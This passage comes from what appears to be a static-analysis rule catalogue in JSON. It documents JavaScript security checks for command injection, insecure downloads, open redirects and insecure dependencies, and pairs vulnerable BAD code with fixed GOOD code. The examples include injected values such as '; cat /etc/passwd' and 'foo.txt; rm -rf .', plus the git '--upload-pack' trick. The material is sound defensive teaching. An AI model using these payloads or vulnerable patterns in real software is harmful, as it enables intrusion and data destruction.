attacks:\n\n\n```javascript\nwindow.location = /.*redirect=([^&]*).*/.exec(document.location.href)[1];\n\n```\n\n## References\n* OWASP: [ XSS Unvalidated Redirects and Forwards Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n* Common Weakness Enumeration: [CWE-601](https://cwe.mitre.org/data/definitions/601.html).\n"},"properties":{"tags":["security","external/cwe/cwe-079","external/cwe/cwe-116","external/cwe/cwe-601"],"description":"Client-side URL redirection based on unvalidated user input\n              may cause redirection to malicious web sites.","id":"js/client-side-unvalidated-url-redirection","kind":"path-problem","name":"Client-side URL redirect","precision":"high","problem.severity":"error","security-severity":"6.1"}},{"id":"js/insecure-download","name":"js/insecure-download","shortDescription":{"text":"Download of sensitive file through insecure connection"},"fullDescription":{"text":"Downloading executables and other sensitive files over an insecure connection opens up for potential man-in-the-middle attacks."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Download of sensitive file through insecure connection\nDownloading executables or other sensitive files over an unencrypted connection can leave a server open to man-in-the-middle attacks (MITM). Such an attack can allow an attacker to insert arbitrary content into the downloaded file, and in the worst case, allow the attacker to execute arbitrary code on the vulnerable system.\n\n\n## Recommendation\nUse a secure transfer protocol when downloading executables or other sensitive files.\n\n\n## Example\nIn this example, a server downloads a shell script from a remote URL using the `node-fetch` library, and then executes this shell script.\n\n\n```javascript\nconst fetch = require(\"node-fetch\");\nconst cp = require(\"child_process\");\n\nfetch('http://mydownload.example.org/myscript.sh')\n    .then(res => res.text())\n    .then(script => cp.execSync(script));\n```\nThe HTTP protocol is vulnerable to MITM, and thus an attacker could potentially replace the downloaded shell script with arbitrary code, which gives the attacker complete control over the system.\n\nThe issue has been fixed in the example below by replacing the HTTP protocol with the HTTPS protocol.\n\n\n```javascript\nconst fetch = require(\"node-fetch\");\nconst cp = require(\"child_process\");\n\nfetch('https://mydownload.example.org/myscript.sh')\n    .then(res => res.text())\n    .then(script => cp.execSync(script));\n```\n\n## References\n* Wikipedia: [Man-in-the-middle attack](https://en.wikipedia.org/wiki/Man-in-the-middle_attack)\n* Common Weakness Enumeration: [CWE-829](https://cwe.mitre.org/data/definitions/829.html).\n","markdown":"# Download of sensitive file through insecure connection\nDownloading executables or other sensitive files over an unencrypted connection can leave a server open to man-in-the-middle attacks (MITM). Such an attack can allow an attacker to insert arbitrary content into the downloaded file, and in the worst case, allow the attacker to execute arbitrary code on the vulnerable system.\n\n\n## Recommendation\nUse a secure transfer protocol when downloading executables or other sensitive files.\n\n\n## Example\nIn this example, a server downloads a shell script from a remote URL using the `node-fetch` library, and then executes this shell script.\n\n\n```javascript\nconst fetch = require(\"node-fetch\");\nconst cp = require(\"child_process\");\n\nfetch('http://mydownload.example.org/myscript.sh')\n    .then(res => res.text())\n    .then(script => cp.execSync(script));\n```\nThe HTTP protocol is vulnerable to MITM, and thus an attacker could potentially replace the downloaded shell script with arbitrary code, which gives the attacker complete control over the system.\n\nThe issue has been fixed in the example below by replacing the HTTP protocol with the HTTPS protocol.\n\n\n```javascript\nconst fetch = require(\"node-fetch\");\nconst cp = require(\"child_process\");\n\nfetch('https://mydownload.example.org/myscript.sh')\n    .then(res => res.text())\n    .then(script => cp.execSync(script));\n```\n\n## References\n* Wikipedia: [Man-in-the-middle attack](https://en.wikipedia.org/wiki/Man-in-the-middle_attack)\n* Common Weakness Enumeration: [CWE-829](https://cwe.mitre.org/data/definitions/829.html).\n"},"properties":{"tags":["security","external/cwe/cwe-829"],"description":"Downloading executables and other sensitive files over an insecure connection\n              opens up for potential man-in-the-middle attacks.","id":"js/insecure-download","kind":"path-problem","name":"Download of sensitive file through insecure connection","precision":"high","problem.severity":"error","security-severity":"8.1"}},{"id":"js/shell-command-injection-from-environment","name":"js/shell-command-injection-from-environment","shortDescription":{"text":"Shell command built from environment values"},"fullDescription":{"text":"Building a shell command string with values from the enclosing environment may cause subtle bugs or vulnerabilities."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Shell command built from environment values\nDynamically constructing a shell command with values from the local environment, such as file paths, may inadvertently change the meaning of the shell command. Such changes can occur when an environment value contains characters that the shell interprets in a special way, for instance quotes and spaces. This can result in the shell command misbehaving, or even allowing a malicious user to execute arbitrary commands on the system.\n\n\n## Recommendation\nIf possible, use hard-coded string literals to specify the shell command to run, and provide the dynamic arguments to the shell command separately to avoid interpretation by the shell.\n\nAlternatively, if the shell command must be constructed dynamically, then add code to ensure that special characters in environment values do not alter the shell command unexpectedly.\n\n\n## Example\nThe following example shows a dynamically constructed shell command that recursively removes a temporary directory that is located next to the currently executing JavaScript file. Such utilities are often found in custom build scripts.\n\n\n```javascript\nvar cp = require(\"child_process\"),\n  path = require(\"path\");\nfunction cleanupTemp() {\n  let cmd = \"rm -rf \" + path.join(__dirname, \"temp\");\n  cp.execSync(cmd); // BAD\n}\n\n```\nThe shell command will, however, fail to work as intended if the absolute path of the script's directory contains spaces. In that case, the shell command will interpret the absolute path as multiple paths, instead of a single path.\n\nFor instance, if the absolute path of the temporary directory is `/home/username/important project/temp`, then the shell command will recursively delete `/home/username/important` and `project/temp`, where the latter path gets resolved relative to the working directory of the JavaScript process.\n\nEven worse, although less likely, a malicious user could provide the path `/home/username/; cat /etc/passwd #/important project/temp` in order to execute the command `cat /etc/passwd`.\n\nTo avoid such potentially catastrophic behaviors, provide the directory as an argument that does not get interpreted by a shell:\n\n\n```javascript\nvar cp = require(\"child_process\"),\n  path = require(\"path\");\nfunction cleanupTemp() {\n  let cmd = \"rm\",\n    args = [\"-rf\", path.join(__dirname, \"temp\")];\n  cp.execFileSync(cmd, args); // GOOD\n}\n\n```\n\n## References\n* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-88](https://cwe.mitre.org/data/definitions/88.html).\n","markdown":"# Shell command built from environment values\nDynamically constructing a shell command with values from the local environment, such as file paths, may inadvertently change the meaning of the shell command. Such changes can occur when an environment value contains characters that the shell interprets in a special way, for instance quotes and spaces. This can result in the shell command misbehaving, or even allowing a malicious user to execute arbitrary commands on the system.\n\n\n## Recommendation\nIf possible, use hard-coded string literals to specify the shell command to run, and provide the dynamic arguments to the shell command separately to avoid interpretation by the shell.\n\nAlternatively, if the shell command must be constructed dynamically, then add code to ensure that special characters in environment values do not alter the shell command unexpectedly.\n\n\n## Example\nThe following example shows a dynamically constructed shell command that recursively removes a temporary directory that is located next to the currently executing JavaScript file. Such utilities are often found in custom build scripts.\n\n\n```javascript\nvar cp = require(\"child_process\"),\n  path = require(\"path\");\nfunction cleanupTemp() {\n  let cmd = \"rm -rf \" + path.join(__dirname, \"temp\");\n  cp.execSync(cmd); // BAD\n}\n\n```\nThe shell command will, however, fail to work as intended if the absolute path of the script's directory contains spaces. In that case, the shell command will interpret the absolute path as multiple paths, instead of a single path.\n\nFor instance, if the absolute path of the temporary directory is `/home/username/important project/temp`, then the shell command will recursively delete `/home/username/important` and `project/temp`, where the latter path gets resolved relative to the working directory of the JavaScript process.\n\nEven worse, although less likely, a malicious user could provide the path `/home/username/; cat /etc/passwd #/important project/temp` in order to execute the command `cat /etc/passwd`.\n\nTo avoid such potentially catastrophic behaviors, provide the directory as an argument that does not get interpreted by a shell:\n\n\n```javascript\nvar cp = require(\"child_process\"),\n  path = require(\"path\");\nfunction cleanupTemp() {\n  let cmd = \"rm\",\n    args = [\"-rf\", path.join(__dirname, \"temp\")];\n  cp.execFileSync(cmd, args); // GOOD\n}\n\n```\n\n## References\n* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-88](https://cwe.mitre.org/data/definitions/88.html).\n"},"properties":{"tags":["correctness","security","external/cwe/cwe-078","external/cwe/cwe-088"],"description":"Building a shell command string with values from the enclosing\n              environment may cause subtle bugs or vulnerabilities.","id":"js/shell-command-injection-from-environment","kind":"path-problem","name":"Shell command built from environment values","precision":"high","problem.severity":"warning","security-severity":"6.3"}},{"id":"js/command-line-injection","name":"js/command-line-injection","shortDescription":{"text":"Uncontrolled command line"},"fullDescription":{"text":"Using externally controlled strings in a command line may allow a malicious user to change the meaning of the command."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Uncontrolled command line\nCode that passes untrusted user input directly to `child_process.exec` or similar APIs that execute shell commands allows the user to execute malicious code.\n\n\n## Recommendation\nIf possible, use APIs that don't run shell commands and that accept command arguments as an array of strings rather than a single concatenated string. This is both safer and more portable.\n\nIf given arguments as a single string, avoid simply splitting the string on whitespace. Arguments may contain quoted whitespace, causing them to split into multiple arguments. Use a library like `shell-quote` to parse the string into an array of arguments instead.\n\nIf this approach is not viable, then add code to verify that the user input string is safe before using it.\n\n\n## Example\nThe following example shows code that extracts a filename from an HTTP query parameter that may contain untrusted data, and then embeds it into a shell command to count its lines without examining it first:\n\n\n```javascript\nvar cp = require(\"child_process\"),\n    http = require('http'),\n    url = require('url');\n\nvar server = http.createServer(function(req, res) {\n    let file = url.parse(req.url, true).query.path;\n\n    cp.execSync(`wc -l ${file}`); // BAD\n});\n\n```\nA malicious user can take advantage of this code by executing arbitrary shell commands. For example, by providing a filename like `foo.txt; rm -rf .`, the user can first count the lines in `foo.txt` and subsequently delete all files in the current directory.\n\nTo avoid this catastrophic behavior, use an API such as `child_process.execFileSync` that does not spawn a shell by default:\n\n\n```javascript\nvar cp = require(\"child_process\"),\n    http = require('http'),\n    url = require('url');\n\nvar server = http.createServer(function(req, res) {\n    let file = url.parse(req.url, true).query.path;\n\n    cp.execFileSync('wc', ['-l', file]); // GOOD\n});\n\n```\nIf you want to allow the user to specify other options to `wc`, you can use a library like `shell-quote` to parse the user input into an array of arguments without risking command injection:\n\n\n```javascript\nvar cp = require(\"child_process\"),\n    http = require('http'),\n    url = require('url'),\n    shellQuote = require('shell-quote');\n\nvar server = http.createServer(function(req, res) {\n    let options = url.parse(req.url, true).query.options;\n\n    cp.execFileSync('wc', shellQuote.parse(options)); // GOOD\n});\n\n```\nAlternatively, the original example can be made safe by checking the filename against an allowlist of safe characters before using it:\n\n\n```javascript\nvar cp = require(\"child_process\"),\n    http = require('http'),\n    url = require('url');\n\nvar server = http.createServer(function(req, res) {\n    let file = url.parse(req.url, true).query.path;\n\n    // only allow safe characters in file name\n    if (file.match(/^[\\w\\.\\-\\/]+$/)) {\n        cp.execSync(`wc -l ${file}`); // GOOD\n    }\n});\n\n```\n\n## References\n* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection).\n* npm: [shell-quote](https://www.npmjs.com/package/shell-quote).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-88](https://cwe.mitre.org/data/definitions/88.html).\n","markdown":"# Uncontrolled command line\nCode that passes untrusted user input directly to `child_process.exec` or similar APIs that execute shell commands allows the user to execute malicious code.\n\n\n## Recommendation\nIf possible, use APIs that don't run shell commands and that accept command arguments as an array of strings rather than a single concatenated string. This is both safer and more portable.\n\nIf given arguments as a single string, avoid simply splitting the string on whitespace. Arguments may contain quoted whitespace, causing them to split into multiple arguments. Use a library like `shell-quote` to parse the string into an array of arguments instead.\n\nIf this approach is not viable, then add code to verify that the user input string is safe before using it.\n\n\n## Example\nThe following example shows code that extracts a filename from an HTTP query parameter that may contain untrusted data, and then embeds it into a shell command to count its lines without examining it first:\n\n\n```javascript\nvar cp = require(\"child_process\"),\n    http = require('http'),\n    url = require('url');\n\nvar server = http.createServer(function(req, res) {\n    let file = url.parse(req.url, true).query.path;\n\n    cp.execSync(`wc -l ${file}`); // BAD\n});\n\n```\nA malicious user can take advantage of this code by executing arbitrary shell commands. For example, by providing a filename like `foo.txt; rm -rf .`, the user can first count the lines in `foo.txt` and subsequently delete all files in the current directory.\n\nTo avoid this catastrophic behavior, use an API such as `child_process.execFileSync` that does not spawn a shell by default:\n\n\n```javascript\nvar cp = require(\"child_process\"),\n    http = require('http'),\n    url = require('url');\n\nvar server = http.createServer(function(req, res) {\n    let file = url.parse(req.url, true).query.path;\n\n    cp.execFileSync('wc', ['-l', file]); // GOOD\n});\n\n```\nIf you want to allow the user to specify other options to `wc`, you can use a library like `shell-quote` to parse the user input into an array of arguments without risking command injection:\n\n\n```javascript\nvar cp = require(\"child_process\"),\n    http = require('http'),\n    url = require('url'),\n    shellQuote = require('shell-quote');\n\nvar server = http.createServer(function(req, res) {\n    let options = url.parse(req.url, true).query.options;\n\n    cp.execFileSync('wc', shellQuote.parse(options)); // GOOD\n});\n\n```\nAlternatively, the original example can be made safe by checking the filename against an allowlist of safe characters before using it:\n\n\n```javascript\nvar cp = require(\"child_process\"),\n    http = require('http'),\n    url = require('url');\n\nvar server = http.createServer(function(req, res) {\n    let file = url.parse(req.url, true).query.path;\n\n    // only allow safe characters in file name\n    if (file.match(/^[\\w\\.\\-\\/]+$/)) {\n        cp.execSync(`wc -l ${file}`); // GOOD\n    }\n});\n\n```\n\n## References\n* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection).\n* npm: [shell-quote](https://www.npmjs.com/package/shell-quote).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-88](https://cwe.mitre.org/data/definitions/88.html).\n"},"properties":{"tags":["correctness","security","external/cwe/cwe-078","external/cwe/cwe-088"],"description":"Using externally controlled strings in a command line may allow a malicious\n              user to change the meaning of the command.","id":"js/command-line-injection","kind":"path-problem","name":"Uncontrolled command line","precision":"high","problem.severity":"error","security-severity":"9.8"}},{"id":"js/shell-command-constructed-from-input","name":"js/shell-command-constructed-from-input","shortDescription":{"text":"Unsafe shell command constructed from library input"},"fullDescription":{"text":"Using externally controlled strings in a command line may allow a malicious user to change the meaning of the command."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Unsafe shell command constructed from library input\nDynamically constructing a shell command with inputs from exported functions may inadvertently change the meaning of the shell command. Clients using the exported function may use inputs containing characters that the shell interprets in a special way, for instance quotes and spaces. This can result in the shell command misbehaving, or even allowing a malicious user to execute arbitrary commands on the system.\n\n\n## Recommendation\nIf possible, provide the dynamic arguments to the shell as an array using a safe API such as `child_process.execFile` to avoid interpretation by the shell.\n\nIf given arguments as a single string, avoid simply splitting the string on whitespace. Arguments may contain quoted whitespace, causing them to split into multiple arguments. Use a library like `shell-quote` to parse the string into an array of arguments instead.\n\nAlternatively, if the command must be interpreted by a shell (for example because it includes I/O redirections), you can use `shell-quote` to escape any special characters in the input before embedding it in the command.\n\n\n## Example\nThe following example shows a dynamically constructed shell command that downloads a file from a remote URL.\n\n\n```javascript\nvar cp = require(\"child_process\");\n\nmodule.exports = function download(path, callback) {\n  cp.exec(\"wget \" + path, callback);\n}\n\n```\nThe shell command will, however, fail to work as intended if the input contains spaces or other special characters interpreted in a special way by the shell.\n\nEven worse, a client might pass in user-controlled data, not knowing that the input is interpreted as a shell command. This could allow a malicious user to provide the input `http://example.org; cat /etc/passwd` in order to execute the command `cat /etc/passwd`.\n\nTo avoid such potentially catastrophic behaviors, provide the inputs from exported functions as an argument that does not get interpreted by a shell:\n\n\n```javascript\nvar cp = require(\"child_process\");\n\nmodule.exports = function download(path, callback) {\n  cp.execFile(\"wget\", [path], callback);\n}\n\n```\nAs another example, consider the following code which is similar to the preceding example, but pipes the output of `wget` into `wc -l` to count the number of lines in the downloaded file.\n\n\n```javascript\nvar cp = require(\"child_process\");\n\nmodule.exports = function download(path, callback) {\n  cp.exec(\"wget \" + path + \" | wc -l\", callback);\n};\n\n```\nIn this case, using `child_process.execFile` is not an option because the shell is needed to interpret the pipe operator. Instead, you can use `shell-quote` to escape the input before embedding it in the command:\n\n\n```javascript\nvar cp = require(\"child_process\");\n\nmodule.exports = function download(path, callback) {\n  cp.exec(\"wget \" + shellQuote.quote([path]) + \" | wc -l\", callback);\n};\n\n```\n\n## References\n* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection).\n* npm: [shell-quote](https://www.npmjs.com/package/shell-quote).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-88](https://cwe.mitre.org/data/definitions/88.html).\n","markdown":"# Unsafe shell command constructed from library input\nDynamically constructing a shell command with inputs from exported functions may inadvertently change the meaning of the shell command. Clients using the exported function may use inputs containing characters that the shell interprets in a special way, for instance quotes and spaces. This can result in the shell command misbehaving, or even allowing a malicious user to execute arbitrary commands on the system.\n\n\n## Recommendation\nIf possible, provide the dynamic arguments to the shell as an array using a safe API such as `child_process.execFile` to avoid interpretation by the shell.\n\nIf given arguments as a single string, avoid simply splitting the string on whitespace. Arguments may contain quoted whitespace, causing them to split into multiple arguments. Use a library like `shell-quote` to parse the string into an array of arguments instead.\n\nAlternatively, if the command must be interpreted by a shell (for example because it includes I/O redirections), you can use `shell-quote` to escape any special characters in the input before embedding it in the command.\n\n\n## Example\nThe following example shows a dynamically constructed shell command that downloads a file from a remote URL.\n\n\n```javascript\nvar cp = require(\"child_process\");\n\nmodule.exports = function download(path, callback) {\n  cp.exec(\"wget \" + path, callback);\n}\n\n```\nThe shell command will, however, fail to work as intended if the input contains spaces or other special characters interpreted in a special way by the shell.\n\nEven worse, a client might pass in user-controlled data, not knowing that the input is interpreted as a shell command. This could allow a malicious user to provide the input `http://example.org; cat /etc/passwd` in order to execute the command `cat /etc/passwd`.\n\nTo avoid such potentially catastrophic behaviors, provide the inputs from exported functions as an argument that does not get interpreted by a shell:\n\n\n```javascript\nvar cp = require(\"child_process\");\n\nmodule.exports = function download(path, callback) {\n  cp.execFile(\"wget\", [path], callback);\n}\n\n```\nAs another example, consider the following code which is similar to the preceding example, but pipes the output of `wget` into `wc -l` to count the number of lines in the downloaded file.\n\n\n```javascript\nvar cp = require(\"child_process\");\n\nmodule.exports = function download(path, callback) {\n  cp.exec(\"wget \" + path + \" | wc -l\", callback);\n};\n\n```\nIn this case, using `child_process.execFile` is not an option because the shell is needed to interpret the pipe operator. Instead, you can use `shell-quote` to escape the input before embedding it in the command:\n\n\n```javascript\nvar cp = require(\"child_process\");\n\nmodule.exports = function download(path, callback) {\n  cp.exec(\"wget \" + shellQuote.quote([path]) + \" | wc -l\", callback);\n};\n\n```\n\n## References\n* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection).\n* npm: [shell-quote](https://www.npmjs.com/package/shell-quote).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-88](https://cwe.mitre.org/data/definitions/88.html).\n"},"properties":{"tags":["correctness","security","external/cwe/cwe-078","external/cwe/cwe-088"],"description":"Using externally controlled strings in a command line may allow a malicious\n              user to change the meaning of the command.","id":"js/shell-command-constructed-from-input","kind":"path-problem","name":"Unsafe shell command constructed from library input","precision":"high","problem.severity":"error","security-severity":"6.3"}},{"id":"js/unnecessary-use-of-cat","name":"js/unnecessary-use-of-cat","shortDescription":{"text":"Unnecessary use of `cat` process"},"fullDescription":{"text":"Using the `cat` process to read a file is unnecessarily complex, inefficient, unportable, and can lead to subtle bugs, or even security vulnerabilities."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Unnecessary use of `cat` process\nUsing the unix command `cat` only to read a file is an unnecessarily complex way to achieve something that can be done in a simpler and safer manner using the Node.js `fs.readFile` API.\n\nThe use of `cat` for simple file reads leads to code that is unportable, inefficient, complex, and can lead to subtle bugs or even security vulnerabilities.\n\n\n## Recommendation\nUse `fs.readFile` or `fs.readFileSync` to read files from the file system.\n\n\n## Example\nThe following example shows code that reads a file using `cat`:\n\n\n```javascript\nvar child_process = require('child_process');\n\nmodule.exports = function (name) {\n    return child_process.execSync(\"cat \" + name).toString();\n};\n\n```\nThe code in the example will break if the input `name` contains special characters (including space). Additionally, it does not work on Windows and if the input is user-controlled, a command injection attack can happen.\n\nThe `fs.readFile` API should be used to avoid these potential issues:\n\n\n```javascript\nvar fs = require('fs');\n\nmodule.exports = function (name) {\n    return fs.readFileSync(name).toString();\n};\n\n```\n\n## References\n* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection).\n* Node.js: [File System API](https://nodejs.org/api/fs.html).\n* [The Useless Use of Cat Award](http://porkmail.org/era/unix/award.html#cat).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n","markdown":"# Unnecessary use of `cat` process\nUsing the unix command `cat` only to read a file is an unnecessarily complex way to achieve something that can be done in a simpler and safer manner using the Node.js `fs.readFile` API.\n\nThe use of `cat` for simple file reads leads to code that is unportable, inefficient, complex, and can lead to subtle bugs or even security vulnerabilities.\n\n\n## Recommendation\nUse `fs.readFile` or `fs.readFileSync` to read files from the file system.\n\n\n## Example\nThe following example shows code that reads a file using `cat`:\n\n\n```javascript\nvar child_process = require('child_process');\n\nmodule.exports = function (name) {\n    return child_process.execSync(\"cat \" + name).toString();\n};\n\n```\nThe code in the example will break if the input `name` contains special characters (including space). Additionally, it does not work on Windows and if the input is user-controlled, a command injection attack can happen.\n\nThe `fs.readFile` API should be used to avoid these potential issues:\n\n\n```javascript\nvar fs = require('fs');\n\nmodule.exports = function (name) {\n    return fs.readFileSync(name).toString();\n};\n\n```\n\n## References\n* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection).\n* Node.js: [File System API](https://nodejs.org/api/fs.html).\n* [The Useless Use of Cat Award](http://porkmail.org/era/unix/award.html#cat).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n"},"properties":{"tags":["correctness","security","maintainability","external/cwe/cwe-078"],"description":"Using the  `cat` process to read a file is unnecessarily complex, inefficient, unportable, and can lead to subtle bugs, or even security vulnerabilities.","id":"js/unnecessary-use-of-cat","kind":"problem","name":"Unnecessary use of `cat` process","precision":"high","problem.severity":"error","security-severity":"6.3"}},{"id":"js/second-order-command-line-injection","name":"js/second-order-command-line-injection","shortDescription":{"text":"Second order command injection"},"fullDescription":{"text":"Using user-controlled data as arguments to some commands, such as git clone, can allow arbitrary commands to be executed."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Second order command injection\nSome shell commands, like `git ls-remote`, can execute arbitrary commands if a user provides a malicious URL that starts with `--upload-pack`. This can be used to execute arbitrary code on the server.\n\n\n## Recommendation\nSanitize user input before passing it to the shell command. For example, ensure that URLs are valid and do not contain malicious commands.\n\n\n## Example\nThe following example shows code that executes `git ls-remote` on a URL that can be controlled by a malicious user.\n\n\n```javascript\nconst express = require(\"express\");\nconst app = express();\n\nconst cp = require(\"child_process\");\n\napp.get(\"/ls-remote\", (req, res) => {\n  const remote = req.query.remote;\n  cp.execFile(\"git\", [\"ls-remote\", remote]); // NOT OK\n});\n\n```\nThe problem has been fixed in the snippet below, where the URL is validated before being passed to the shell command.\n\n\n```javascript\nconst express = require(\"express\");\nconst app = express();\n\nconst cp = require(\"child_process\");\n\napp.get(\"/ls-remote\", (req, res) => {\n  const remote = req.query.remote;\n  if (!(remote.startsWith(\"git@\") || remote.startsWith(\"https://\"))) {\n    throw new Error(\"Invalid remote: \" + remote);\n  }\n  cp.execFile(\"git\", [\"ls-remote\", remote]); // OK\n});\n\n```\n\n## References\n* Max Justicz: [Hacking 3,000,000 apps at once through CocoaPods](https://justi.cz/security/2021/04/20/cocoapods-rce.html).\n* Git: [Git - git-ls-remote Documentation](https://git-scm.com/docs/git-ls-remote/2.22.0#Documentation/git-ls-remote.txt---upload-packltexecgt).\n* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-88](https://cwe.mitre.org/data/definitions/88.html).\n","markdown":"# Second order command injection\nSome shell commands, like `git ls-remote`, can execute arbitrary commands if a user provides a malicious URL that starts with `--upload-pack`. This can be used to execute arbitrary code on the server.\n\n\n## Recommendation\nSanitize user input before passing it to the shell command. For example, ensure that URLs are valid and do not contain malicious commands.\n\n\n## Example\nThe following example shows code that executes `git ls-remote` on a URL that can be controlled by a malicious user.\n\n\n```javascript\nconst express = require(\"express\");\nconst app = express();\n\nconst cp = require(\"child_process\");\n\napp.get(\"/ls-remote\", (req, res) => {\n  const remote = req.query.remote;\n  cp.execFile(\"git\", [\"ls-remote\", remote]); // NOT OK\n});\n\n```\nThe problem has been fixed in the snippet below, where the URL is validated before being passed to the shell command.\n\n\n```javascript\nconst express = require(\"express\");\nconst app = express();\n\nconst cp = require(\"child_process\");\n\napp.get(\"/ls-remote\", (req, res) => {\n  const remote = req.query.remote;\n  if (!(remote.startsWith(\"git@\") || remote.startsWith(\"https://\"))) {\n    throw new Error(\"Invalid remote: \" + remote);\n  }\n  cp.execFile(\"git\", [\"ls-remote\", remote]); // OK\n});\n\n```\n\n## References\n* Max Justicz: [Hacking 3,000,000 apps at once through CocoaPods](https://justi.cz/security/2021/04/20/cocoapods-rce.html).\n* Git: [Git - git-ls-remote Documentation](https://git-scm.com/docs/git-ls-remote/2.22.0#Documentation/git-ls-remote.txt---upload-packltexecgt).\n* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-88](https://cwe.mitre.org/data/definitions/88.html).\n"},"properties":{"tags":["correctness","security","external/cwe/cwe-078","external/cwe/cwe-088"],"description":"Using user-controlled data as arguments to some commands, such as git clone,\n              can allow arbitrary commands to be executed.","id":"js/second-order-command-line-injection","kind":"path-problem","name":"Second order command injection","precision":"high","problem.severity":"error","security-severity":"7.0"}},{"id":"js/insecure-dependency","name":"js/insecure-dependency","shortDescription":{"text":"Dependency download using unencrypted communication channel"},"fullDescription":{"text":"Using unencrypted protocols to fetch dependencies can leave an application open to man-in-the-middle attacks."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Dependency download using unencrypted communication channel\nUsing an insecure protocol like HTTP or FTP to download build dependencies makes the build process vulnerable to a man-in-the-middle (MITM) attack.\n\nThis can allow attackers to inject malicious code into the downloaded dependencies, and thereby infect the build artifacts and execute arbitrary code on the machine building the artifacts.\n\n\n## Recommendation\nAlways use a secure protocol, such as HTTPS or SFTP, when downloading artifacts from an URL.\n\n\n## Example\nThe below example shows a `package.json` file that downloads a dependency using the insecure HTTP protocol.\n\n\n```json\n{\n  \"name\": \"example-project\",\n  \"dependencies\": {\n    \"unencrypted\": \"http://example.org/foo/tarball/release/0.0.1\",\n    \"lodash\": \"^4.0.0\"\n  }\n}\n```\nThe fix is to change the protocol to HTTPS.\n\n\n```json\n{\n  \"name\": \"example-project\",\n  \"dependencies\": {\n    \"unencrypted\": \"https://example.org/foo/tarball/release/0.0.1\",\n    \"lodash\": \"^4.0.0\"\n  }\n}\n```\n\n## References\n* Jonathan Leitschuh: [ Want to take over the Java ecosystem? All you need is a MITM! ](https://infosecwriteups.com/want-to-take-over-the-java-ecosystem-all-you-need-is-a-mitm-1fc329d898fb)\n* Max Veytsman: [ How to take over the computer of any Java (or Closure or Scala) Developer. ](https://max.computer/blog/how-to-take-over-the-computer-of-any-java-or-clojure-or-scala-developer/)\n* Wikipedia: [Supply chain attack.](https://en.wikipedia.org/wiki/Supply_chain_attack)\n* Wikipedia: [Man-in-the-middle attack.](https://en.wikipedia.org/wiki/Man-in-the-middle_attack)\n* Common Weakness Enumeration: [CWE-300](https://cwe.mitre.org/data/definitions/300.html).\n* Common Weakness Enumeration: [CWE-319](https://cwe.mitre.org/data/definitions/319.html).\n* Common Weakness Enumeration: [CWE-494](https://cwe.mitre.org/data/definitions/494.html).\n* Common Weakness Enumeration: [CWE-829](https://cwe.mitre.org/data/definitions/829.html).\n","markdown":"# Dependency download using unencrypted communication channel\nUsing an insecure protocol like HTTP or FTP to download build dependencies makes the build process vulnerable to a man-in-the-middle (MITM) attack.\n\nThis can allow attackers to inject malicious code into the downloaded dependencies, and thereby infect the build artifacts and execute arbitrary code on the machine building the artifacts.\n\n\n## Recommendation\nAlways use a secure protocol, such as HTTPS or SFTP, when downloading artifacts from an URL.\n\n\n## Example\nThe below example shows a `package.json` file that downloads a dependency using the insecure HTTP protocol.\n\n\n```json\n{\n  \"name\": \"example-project\",\n  \"dependencies\": {\n    \"unencrypted\": \"http://example.org/foo/tarball/release/0.0.1\",\n    \"lodash\": \"^4.0.0\"\n  }\n}\n```\nThe fix is to change the protocol to HTTPS.\n\n\n```json\n{\n  \"name\": \"example-project\",\n  \"dependencies\": {\n    \"unencrypted\": \"https://example.org/foo/tarball/release/0.0.1\",\n    \"lodash\": \"^4.0.0\"\n  }\n}\n```\n\n## References\n* Jonathan Leitschuh: [ Want to take over the Java ecosystem? All you need is a MITM! ](https://infosecwriteups.com/want-to-take-over-the-java-ecosystem-all-you-need-is-a-mitm-1fc329d898fb)\n* Max Veytsman: [ How to take over the computer of any Java (or Closure or Scala) Developer. ](https://max.computer/blog/how-to-take-over-the-computer-of-any-java-or-clojure-or-scala-developer/)\n* Wikipedia: [Supply chain attack.](https://en.wikipedia.org/wiki/Supply_chain_attack)\n* Wikipedia: [Man-in-the-middle attack.](https://en.wikipedia.org/wiki/Man-in-the-middle_attack)\n* Common Weakness Enumeration: [CWE-300](https://cwe.mitre.org/data/definitions/300.html).\n* Common Weakness Enumeration: 